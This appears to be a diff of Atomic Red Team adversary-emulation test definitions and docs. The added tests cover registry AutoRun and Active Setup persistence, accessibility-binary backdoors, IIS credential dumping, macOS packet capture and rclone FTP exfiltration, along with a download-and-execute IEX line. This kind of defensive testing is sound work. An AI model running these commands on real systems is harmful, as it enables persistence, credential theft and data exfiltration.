default: notepad.exe
|
||||
executor:
|
||||
command: |-
|
||||
$path = "HKCU:\Software\Microsoft\Command Processor"
|
||||
if (!(Test-Path -path $path)){
|
||||
New-Item -ItemType Key -Path $path
|
||||
}
|
||||
New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
|
||||
Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
name: powershell
|
||||
T1546.004:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -37829,14 +38033,14 @@ privilege-escalation:
|
||||
command_to_add:
|
||||
description: Command to add to the .bash_profile file
|
||||
type: String
|
||||
default: echo "Hello from Atomic Red Team T1546.004"
|
||||
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
|
||||
executor:
|
||||
command: 'echo ''#{command_to_add}'' >> ~/.bash_profile
|
||||
|
||||
'
|
||||
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bash_profile
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
head -n '-2' ~/.bash_profile > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bash_profile
|
||||
name: sh
|
||||
- name: Add command to .bashrc
|
||||
auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
|
||||
@@ -37850,14 +38054,14 @@ privilege-escalation:
|
||||
command_to_add:
|
||||
description: Command to add to the .bashrc file
|
||||
type: String
|
||||
default: echo "Hello from Atomic Red Team T1546.004"
|
||||
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
|
||||
executor:
|
||||
command: 'echo ''#{command_to_add}'' >> ~/.bashrc
|
||||
|
||||
'
|
||||
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bashrc
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
head -n '-2' ~/.bashrc > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bashrc
|
||||
name: sh
|
||||
T1134.005:
|
||||
technique:
|
||||
@@ -45709,7 +45913,6 @@ execution:
|
||||
Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
|
||||
Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: PowerShell Downgrade Attack
|
||||
auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e
|
||||
description: |
|
||||
@@ -50486,7 +50689,76 @@ persistence:
|
||||
- 'Command: Command Execution'
|
||||
x_mitre_permissions_required:
|
||||
- Administrator
|
||||
atomic_tests: []
|
||||
identifier: T1547.014
|
||||
atomic_tests:
|
||||
- name: HKLM - Add atomic_test key to launch executable as part of user setup
|
||||
auto_generated_guid: deff4586-0517-49c2-981d-bbea24d48d71
|
||||
description: "This test will create an \"atomic_test\" key under 'HKLM:\\SOFTWARE\\Microsoft\\Active
|
||||
Setup\\Installed Components' to launch calc by configuring an active setup
|
||||
executable and \nforcing to run active setup using the \"runonce.exe /AlternateShellStartup\"
|
||||
command. \nWithout the \"runonce.exe /AlternateShellStartup\" command it would
|
||||
run during the next logon for each user.\n\nNote: If you logout before running
|
||||
the cleanup command, you will be required to go through the OOBE (out-of-box
|
||||
experience) setup sequence to log back in. \nThe payload will only run once
|
||||
unless the cleanup command is run in between tests.\n\n[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
payload:
|
||||
description: Payload to run once during login
|
||||
type: String
|
||||
default: C:\Windows\System32\calc.exe
|
||||
executor:
|
||||
command: "New-Item \"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\"
|
||||
-Name \"atomic_test\" -Force\nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Active
|
||||
Setup\\Installed Components\\atomic_test\" \"(Default)\" \"ART TEST\" -Force\nSet-ItemProperty
|
||||
\"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\atomic_test\"
|
||||
\"StubPath\" \"#{payload}\" -Force \n& $env:SYSTEMROOT\\system32\\runonce.exe
|
||||
/AlternateShellStartup"
|
||||
cleanup_command: |-
|
||||
Remove-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
Remove-Item "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - Add malicious StubPath value to existing Active Setup Entry
|
||||
auto_generated_guid: 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
|
||||
description: "This test will add a StubPath entry to the Active Setup native
|
||||
registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600})
|
||||
\nSaid key doesn't have a StubPath value by default, by adding one it will
|
||||
launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup.
|
||||
\nWithout the last command it will normally run on next user logon. Note:
|
||||
this test will only run once successfully if no cleanup command is run in
|
||||
between test.\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
payload:
|
||||
description: Payload to run once during login
|
||||
type: String
|
||||
default: C:\Windows\System32\calc.exe
|
||||
executor:
|
||||
command: |-
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
cleanup_command: |-
|
||||
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force
|
||||
Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Force
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing
|
||||
version number
|
||||
auto_generated_guid: 04d55cef-f283-40ba-ae2a-316bc3b5e78c
|
||||
description: "This test will decrease the version number of the 'Internet Explorer
|
||||
Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for
|
||||
the current user, \nwhich will force the StubPath payload (if set) to execute.\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
T1180:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -56132,7 +56404,7 @@ persistence:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
|
||||
IF NOT EXIST C:\Windows\System32\sethc_backup.exe (copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe) ELSE ( pushd )
|
||||
takeown /F C:\Windows\System32\sethc.exe /A
|
||||
icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
|
||||
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
|
||||
@@ -56141,6 +56413,33 @@ persistence:
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Create Symbolic Link From osk.exe to cmd.exe
|
||||
auto_generated_guid: 51ef369c-5e87-4f33-88cd-6d61be63edf2
|
||||
description: 'Replace accessiblity executable with cmd.exe to provide elevated
|
||||
command prompt from login screen without logging in.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
IF NOT EXIST %windir%\System32\osk.exe.bak (copy %windir%\System32\osk.exe %windir%\System32\osk.exe.bak) ELSE ( pushd )
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
mklink %windir%\System32\osk.exe %windir%\System32\cmd.exe
|
||||
cleanup_command: |
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
copy /Y %windir%\System32\osk.exe.bak %windir%\System32\osk.exe
|
||||
icacls %windir%\system32\osk.exe /inheritance:d
|
||||
icacls %windir%\system32\osk.exe /setowner "NT SERVICE\TrustedInstaller"
|
||||
icacls %windir%\System32\osk.exe /grant "NT SERVICE\TrustedInstaller":F /t
|
||||
icacls %windir%\system32\osk.exe /grant:r SYSTEM:RX
|
||||
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1504:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -57105,6 +57404,34 @@ persistence:
|
||||
mv -Force #{settings_json_tmp} #{settings_json_def}
|
||||
taskkill /F /IM "#{calculator}" > $null
|
||||
name: powershell
|
||||
- name: Add macOS LoginItem using Applescript
|
||||
auto_generated_guid: 716e756a-607b-41f3-8204-b214baf37c1d
|
||||
description: |
|
||||
Runs osascript on a file to create new LoginItem for current user.
|
||||
NOTE: Will popup dialog prompting user to Allow or Deny Terminal.app to control "System Events"
|
||||
Therefore, it can't be automated until the TCC is granted.
|
||||
The login item launches Safari.app when user logs in, but there is a cleanup script to remove it as well.
|
||||
In addition to the `osascript` Process Events, file modification events to
|
||||
`/Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm` should be seen.
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
scriptfile:
|
||||
description: path to Applescript source to add Safari LoginItem.
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1547.015/src/add_login_item.osa
|
||||
cleanup_script:
|
||||
description: path to Applescript source to delete Safari LoginItem.
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1547.015/src/remove_login_item.osa
|
||||
executor:
|
||||
command: 'osascript #{scriptfile}
|
||||
|
||||
'
|
||||
cleanup_command: 'osascript #{cleanup_script}
|
||||
|
||||
'
|
||||
name: bash
|
||||
T1205.001:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -58643,7 +58970,6 @@ persistence:
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
|
||||
Remove-Item "#{new_startup_folder}" -Recurse -Force
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKCU - Policy Settings Explorer Run Key
|
||||
auto_generated_guid: a70faea1-e206-4f6f-8d9a-67379be8f6f1
|
||||
description: "This test will create a new value under HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run
|
||||
@@ -60448,7 +60774,8 @@ persistence:
|
||||
- description: 'AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
|
||||
|
||||
'
|
||||
prereq_command: 'if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
|
||||
prereq_command: 'if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll)
|
||||
{ exit 0} else { exit 1}
|
||||
|
||||
'
|
||||
get_prereq_command: |
|
||||
@@ -60463,6 +60790,47 @@ persistence:
|
||||
-Name AutodialDLL -Value $env:windir\system32\rasadhlp.dll
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
|
||||
description: |-
|
||||
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to Execute
|
||||
type: string
|
||||
default: notepad.exe
|
||||
executor:
|
||||
command: New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor"
|
||||
-Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
cleanup_command: Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command
|
||||
Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
|
||||
description: |-
|
||||
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to Execute
|
||||
type: string
|
||||
default: notepad.exe
|
||||
executor:
|
||||
command: |-
|
||||
$path = "HKCU:\Software\Microsoft\Command Processor"
|
||||
if (!(Test-Path -path $path)){
|
||||
New-Item -ItemType Key -Path $path
|
||||
}
|
||||
New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
|
||||
Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
name: powershell
|
||||
T1546.004:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -60614,14 +60982,14 @@ persistence:
|
||||
command_to_add:
|
||||
description: Command to add to the .bash_profile file
|
||||
type: String
|
||||
default: echo "Hello from Atomic Red Team T1546.004"
|
||||
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
|
||||
executor:
|
||||
command: 'echo ''#{command_to_add}'' >> ~/.bash_profile
|
||||
|
||||
'
|
||||
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bash_profile
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
head -n '-2' ~/.bash_profile > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bash_profile
|
||||
name: sh
|
||||
- name: Add command to .bashrc
|
||||
auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
|
||||
@@ -60635,14 +61003,14 @@ persistence:
|
||||
command_to_add:
|
||||
description: Command to add to the .bashrc file
|
||||
type: String
|
||||
default: echo "Hello from Atomic Red Team T1546.004"
|
||||
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
|
||||
executor:
|
||||
command: 'echo ''#{command_to_add}'' >> ~/.bashrc
|
||||
|
||||
'
|
||||
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bashrc
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
head -n '-2' ~/.bashrc > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bashrc
|
||||
name: sh
|
||||
T1547.002:
|
||||
technique:
|
||||
@@ -65175,6 +65543,7 @@ collection:
|
||||
|
||||
'
|
||||
get_prereq_command: |
|
||||
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
|
||||
if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
|
||||
Write-Host Follow the installation prompts to continue
|
||||
cmd /c "$env:Temp\winzip.exe"
|
||||
@@ -72817,6 +73186,45 @@ credential-access:
|
||||
'
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using
|
||||
list)
|
||||
auto_generated_guid: 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
|
||||
description: |-
|
||||
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
|
||||
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: IIS must be installed prior to running the test
|
||||
prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed")
|
||||
{exit 0} else {exit 1}
|
||||
get_prereq_command: Install-WindowsFeature -name Web-Server -IncludeManagementTools
|
||||
executor:
|
||||
command: |-
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using
|
||||
config)
|
||||
auto_generated_guid: 42510244-5019-48fa-a0e5-66c3b76e6049
|
||||
description: |-
|
||||
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
|
||||
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: IIS must be installed prior to running the test
|
||||
prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed")
|
||||
{exit 0} else {exit 1}
|
||||
get_prereq_command: Install-WindowsFeature -name Web-Server -IncludeManagementTools
|
||||
executor:
|
||||
command: C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
T1171:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -74414,7 +74822,7 @@ credential-access:
|
||||
tshark -c 5 -i #{interface}
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Packet Capture macOS
|
||||
- name: Packet Capture macOS using tcpdump or tshark
|
||||
auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608
|
||||
description: |
|
||||
Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
|
||||
@@ -74539,6 +74947,88 @@ credential-access:
|
||||
cleanup_command: pktmon filter remove
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Packet Capture macOS using /dev/bpfN with sudo
|
||||
auto_generated_guid: e6fe5095-545d-4c8b-a0ae-e863914be3aa
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few
|
||||
seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: String
|
||||
default: en0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: String
|
||||
default: "/tmp/t1040_macos_pcapdemo"
|
||||
dependency_executor_name: bash
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Filtered Packet Capture macOS using /dev/bpfN with sudo
|
||||
auto_generated_guid: e2480aee-23f3-4f34-80ce-de221e27cd19
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp''
|
||||
and captures packets for a few seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: String
|
||||
default: en0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: String
|
||||
default: "/tmp/t1040_macos_pcapdemo"
|
||||
dependency_executor_name: bash
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -f -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: bash
|
||||
elevation_required: true
|
||||
T1552.002:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -83550,7 +84040,7 @@ discovery:
|
||||
tshark -c 5 -i #{interface}
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Packet Capture macOS
|
||||
- name: Packet Capture macOS using tcpdump or tshark
|
||||
auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608
|
||||
description: |
|
||||
Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
|
||||
@@ -83675,6 +84165,88 @@ discovery:
|
||||
cleanup_command: pktmon filter remove
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Packet Capture macOS using /dev/bpfN with sudo
|
||||
auto_generated_guid: e6fe5095-545d-4c8b-a0ae-e863914be3aa
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few
|
||||
seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: String
|
||||
default: en0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: String
|
||||
default: "/tmp/t1040_macos_pcapdemo"
|
||||
dependency_executor_name: bash
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Filtered Packet Capture macOS using /dev/bpfN with sudo
|
||||
auto_generated_guid: e2480aee-23f3-4f34-80ce-de221e27cd19
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp''
|
||||
and captures packets for a few seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: String
|
||||
default: en0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: String
|
||||
default: "/tmp/t1040_macos_pcapdemo"
|
||||
dependency_executor_name: bash
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -f -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: bash
|
||||
elevation_required: true
|
||||
T1135:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -102997,3 +103569,56 @@ exfiltration:
|
||||
$ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
|
||||
$ftp_del.GetResponse()}} catch{}
|
||||
name: powershell
|
||||
- name: Exfiltration Over Alternative Protocol - FTP - Rclone
|
||||
auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b
|
||||
description: |-
|
||||
Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
|
||||
[Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
ftp_server:
|
||||
description: Your own ftp server
|
||||
type: string
|
||||
default: ftp.dlptest.com
|
||||
ftp_pass:
|
||||
description: Your FTP user's password
|
||||
type: string
|
||||
default: rNrKYTX9g7z3RgJRmxWuGHbeu
|
||||
ftp_user:
|
||||
description: Your FTP username
|
||||
type: string
|
||||
default: dlpuser
|
||||
ftp_port:
|
||||
description: Your FTP's port
|
||||
type: string
|
||||
default: 21
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: 'Check if the exfil package exists
|
||||
|
||||
'
|
||||
prereq_command: 'if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit
|
||||
0} else {exit 1}
|
||||
|
||||
'
|
||||
get_prereq_command: 'fsutil file createnew C:\Users\Public\Downloads\exfil.zip
|
||||
20485760
|
||||
|
||||
'
|
||||
- description: Check if rclone zip exists
|
||||
prereq_command: 'if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip)
|
||||
{exit 0} else {exit 1}
|
||||
|
||||
'
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
|
||||
Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
|
||||
executor:
|
||||
command: |-
|
||||
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
|
||||
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
|
||||
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
|
||||
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
@@ -13,6 +13,10 @@ Several of the tools mentioned in associated sub-techniques may be used by both
|
||||
|
||||
- [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials)
|
||||
|
||||
- [Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)](#atomic-test-4---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-list)
|
||||
|
||||
- [Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)](#atomic-test-5---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-config)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -172,4 +176,88 @@ Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
|
||||
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
|
||||
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `powershell`!
|
||||
##### Description: IIS must be installed prior to running the test
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
Install-WindowsFeature -name Web-Server -IncludeManagementTools
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
|
||||
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
|
||||
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 42510244-5019-48fa-a0e5-66c3b76e6049
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
